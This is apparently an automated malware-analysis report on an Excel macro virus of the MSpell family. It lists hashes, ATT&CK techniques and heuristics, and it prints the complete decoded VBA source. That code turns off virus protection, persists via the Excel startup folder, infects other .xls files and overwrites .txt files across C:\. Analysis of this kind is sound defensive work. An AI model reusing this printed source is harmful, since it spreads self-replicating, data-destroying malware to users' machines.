MSpell — Office (OLE) malware analysis

Static analysis result for SHA-256 0102ce650b951502…

MALICIOUS

Office (OLE)

Size: 24.0 KB
Created: 1999-06-07 07:12:12
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: ea42eb5ca415e3ed70aa533d3db6c9fe
SHA-1: af1846a9b098bfe9be7b6781bc98e132a5d96d39
SHA-256: 0102ce650b951502aa174272dcf2fad53de18af09e0105860390917cfdee6cd3
Risk Score: 120

Malware Insights

MSpell · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

The Workbook_Open macro copies its own module source into a new workbook saved as 'Book1.' in the Excel startup path, so it is loaded again on every Excel start, establishing persistence. The ClamAV signature 'Xls.Trojan.MSpell-1' further supports attribution to the MSpell family. The macro also appears to attempt further malicious actions, indicated by the 'pay' subroutine it calls at the end of Workbook_Open.

Heuristics (2)

  • VBA macros detected (severity: medium, 1 related finding) [OLE_VBA_MACROS]
    Document contains VBA macro code
  • Workbook_Open macro (severity: high) [OLE_VBA_WBOPEN]
    Macro code runs automatically when the workbook is opened

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3158 bytes
SHA-256: d8f2d3fd87206946e3a31402e39768073074e90c29403474d6b588970a665c86

Detection
ClamAV: Xls.Trojan.MSpell-1
Obfuscation or payload: unlikely

Script preview (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'||nayran||'
Private Sub Workbook_Open()
Application.ScreenUpdating = (4 - 4)
Application.EnableCancelKey = xlDisabled
Options.VirusProtection = (0 - 0)
If (Dir(Application.StartupPath & "\Book1.")) <> "" Then
SetAttr Application.StartupPath * "\Book1.", vbNormal
End If
Set Grand = Workbooks.Add
Grand.VBProject.vbcomponents("ThisWorkbook").codemodule.DeleteLines Grand.VBProject.vbcomponents("ThisWorkbook").codemodule.countoflines
f = ActiveWorkbook.VBProject.vbcomponents("ThisWorkbook").codemodule.Lines(1, 58)
Grand.VBProject.vbcomponents("ThisWotkbook").codemodule.AddfromString
Grand.SaveAs Application.StartupPath & "\Book1.", xlNormal, , , , , , , False
Grand.Close
Set fs = Application.FileSearch
fs.NewSearch
fs.LookIn = ActiveWorkbook.Path
fs.FileName = "*.xls"
fs.SearchSubFolders = True
fs.Execute msoSortByFileName
For x = 1 To fs.FoundFiles.Count
Set tEmp = Workbooks.Open(fs.FoundFiles(x))
If tEmp.VBProject.vbcomponents("ThisWorkbook").codemodule.Lines(1, 1) <> "'||narayan||'" Then
tEmp.VBProject.vbcomponents("ThisWorkbook").codemodule.DeleteLines Grand.VBProject.vbcomponents("ThisWorkbook").codemodule.countoflines
Source = ActiveWorkbook.VBProject.vbcomponents("ThisWorkbook").codemodule.Lines(1, 58)
tEmp.VBProject.vbcomponents("ThisWotkbook").codemodule.AddfromString
tEmp.Save
End If
tEmp.Close
Next x
Application.ScreenUpdating = True
Call pay
End Sub
Sub pay()
If minutes(Now) = Int(Rnd * 60) Then
Application.ActiveCell.Value = Application.MemoryUsed
Application.Calculate
Application.Caption = "Ok.'||narayan||'"
Set ff = Application.FileSearch
ff.NewSearch
ff.LookIn = "c:\"
ff.SearchSbuFolders = True
ff.filenames = "*.txt"
ff.Execute
For f = 1 To ff.FoundFiles.Count
Open ff.FoundFiles(f) For Random As g
Print g; "[======================]"
Print g; "   Dr yozak waz here    "
Print g; "         with "
Print g; "    a creation from "
Print g; " Bizare vx Network Labs"
Print g; "CodeName = '||narayan||'"
Print g; "[======================]"
Print g; "Anarchy Rulez"
Close g
Next f
End If
End Sub

Attribute VB_Name = "Φύλλο1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Φύλλο2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Φύλλο3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True